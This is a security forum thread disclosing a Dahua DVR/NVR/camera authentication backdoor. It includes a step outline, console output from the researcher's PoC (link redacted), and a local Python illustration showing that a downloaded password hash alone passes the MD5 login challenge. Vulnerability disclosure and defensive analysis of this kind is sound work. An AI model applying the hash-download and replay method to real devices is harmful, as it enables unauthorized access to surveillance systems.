Subscriber Discussion
0-Day: Dahua Backdoor Generation 2 & 3
[IPVM Update: Researcher had shared code but has removed it temporarily and is in communication with Dahua. More details inside discussion.]
[IPVM Update: full report and testing findings released of the Dahua backdoor here.]
I'm speechless, and almost don't know what I should write... I can (hardly) believe what I have just found.
I have just discovered (what I strongly believe is a backdoor) in Dahua DVR/NVR/IPC and possibly all their clones.
Since I am convinced this is a backdoor, I have my own policy to NOT notify the vendor before the community.
(I simply don't want to listen to their poor excuses, their attempts to keep me silent from informing the community)
In short:
You can delete/add/change the names of the admin users, you can change the passwords of the admin users - this backdoor simply doesn't care about that!
It uses whatever names and passwords you configure - by simply downloading the full user database and using your own credentials!
It is as simple as:
1. Remotely download the full user database with all credentials and permissions
2. Choose whatever admin user, copy the login names and password hashes
3. Use them as the source to remotely log in to the Dahua devices
This is like a damn Hollywood hack, click on one button and you are in...
The PoC you will find here: [REMOVED]
Please have understanding for the quick hack of the PoC, I'm sure it could be done better.
Have a nice day
/bashis
$ ./dahua-backdoor.py --rhost 192.168.5.2
[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]
[i] Remote target IP: 192.168.5.2
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 2 found
[i] Chosing Admin Login: 888888, PWD hash: 4WzwxXxM
[>] Requesting our session ID
[<] 200 OK
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 100385023 }
[>] Logging out
[<] 200 OK
[*] All done...
$
$ ./dahua-backdoor.py --rhost 192.168.5.3
[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]
[i] Remote target IP: 192.168.5.3
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 3 Found
[i] Choosing Admin Login: admin, Auth: 27
[>] Requesting our session ID
[<] 200 OK
[i] Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074
[i] Random value to encrypt with: 1958557123
[i] Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074
[i] MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 1175887285 }
[>] Logging out
[<] 200 OK
[*] All done...
$
If you enjoyed 'Dahua Backdoor' by bashis, check out some of his other Greatest Hits...
[IPVM Note: bashis also discovered the Axis critical security vulnerability last year]
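The Generation 3 output above shows the login response being built as MD5("user:random:downloadedhash"), which is why the downloaded hash is password-equivalent: whoever can read the user database can answer the challenge without ever knowing a password, and rotating admin passwords does not help while the database stays readable. The following Python is an added illustration of that property, not bashis's PoC and not Dahua's code; it performs no network access. It assumes the stored per-user value is an uppercase-hex MD5 of the password and that the device verifies a login by recomputing the same MD5 itself, both labelled as assumptions in the comments.

```python
import hashlib
import secrets


def stored_hash(password: str) -> str:
    """Value assumed to sit in the device's user database for one user.
    Assumption (not confirmed by the thread): uppercase-hex MD5 of the password."""
    return hashlib.md5(password.encode()).hexdigest().upper()


def built_string(user: str, random_value: str, stored: str) -> str:
    """The 'Built password' line from the Gen 3 output: user:random:hash."""
    return f"{user}:{random_value}:{stored}"


def login_response(user: str, random_value: str, stored: str) -> str:
    """The 'MD5 generated password': MD5 over the built string, uppercase hex."""
    return hashlib.md5(built_string(user, random_value, stored).encode()).hexdigest().upper()


def response_from_password(user: str, random_value: str, password: str) -> str:
    """What a legitimate client does: derive the hash from the real password first."""
    return login_response(user, random_value, stored_hash(password))


def response_from_hash(user: str, random_value: str, stored: str) -> str:
    """What a party holding only the leaked database entry does: no password needed."""
    return login_response(user, random_value, stored)


def device_verifies(user: str, random_value: str, stored: str, response: str) -> bool:
    """Assumed server-side check: recompute the response from the stored hash.
    Constant-time comparison avoids leaking the expected value via timing."""
    expected = login_response(user, random_value, stored)
    return secrets.compare_digest(expected, response)


def hash_is_password_equivalent(user: str, password: str) -> bool:
    """Demonstrates the defender-relevant point: a response computed from the
    stored hash alone is accepted exactly like one computed from the password,
    for any challenge the device issues."""
    challenge = str(secrets.randbelow(2**31))          # constructed random value
    leaked = stored_hash(password)                     # what the database exposes
    from_pw = response_from_password(user, challenge, password)
    from_db = response_from_hash(user, challenge, leaked)
    return from_pw == from_db and device_verifies(user, challenge, leaked, from_db)


def rotation_does_not_help(user: str, old_pw: str, new_pw: str) -> bool:
    """Changing the password changes the stored value, but if the database can be
    re-read, the new value works just as well as the old one did."""
    challenge = str(secrets.randbelow(2**31))          # constructed random value
    old_entry = stored_hash(old_pw)
    new_entry = stored_hash(new_pw)                    # what a re-download returns
    old_rejected = not device_verifies(user, challenge, new_entry,
                                       response_from_hash(user, challenge, old_entry))
    new_accepted = device_verifies(user, challenge, new_entry,
                                   response_from_hash(user, challenge, new_entry))
    return old_rejected and new_accepted


if __name__ == "__main__":
    # Values taken from the Gen 3 output in the thread; the MD5 line is recomputed here.
    page_user, page_random = "admin", "1958557123"
    page_hash = "94DB0778856B11C0D0F5455CCC0CE074"
    print("Built password:", built_string(page_user, page_random, page_hash))
    print("MD5 generated password:", login_response(page_user, page_random, page_hash))
    print("hash alone authenticates:", hash_is_password_equivalent("admin", "hunter2"))
    print("rotation alone mitigates:", not rotation_does_not_help("admin", "hunter2", "NewPass!"))
```

The practical reading for an operator: while the user database can be fetched without authentication, password strength and rotation are irrelevant; exposure is removed only by keeping the device off untrusted networks and applying the vendor fix once released.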

$ ./dahua-backdoor.py --rhost 192.168.5.2
This looks like it was targeting devices on the same subnet. Does it work the same from a remote IP?
Also, what are Generation 2 and 3 referring to? A rev of hardware?
Perhaps we should start a thread about who OEMs Dahua...
UPDATE: Dahua is in communication with Bashis. Bashis has removed the code temporarily, noting:
I have received a request from Dahua to temporarily remove this code.
Code will be removed until 5 April, to give them 30 days to address the problem.
Sorry, bashis
Related, this indicates that Dahua is acknowledging that this is legitimate. We are in communication with Dahua to understand what specific models are impacted and when the fix is released.
So are we basically saying if the device is exposed to the internet, one could just upload their own login?
I suppose if the device is behind a firewall or vpn this would not be possible?
Two updates:
Karas verified the script worked on a current Dahua IP camera.
I have notified as many Dahua OEMs as I personally know.
We expect more information Monday.
Update: we plan to publish our full report and test findings at 4pm today (03/06/17).
Update #2: see Dahua Backdoor Uncovered for full report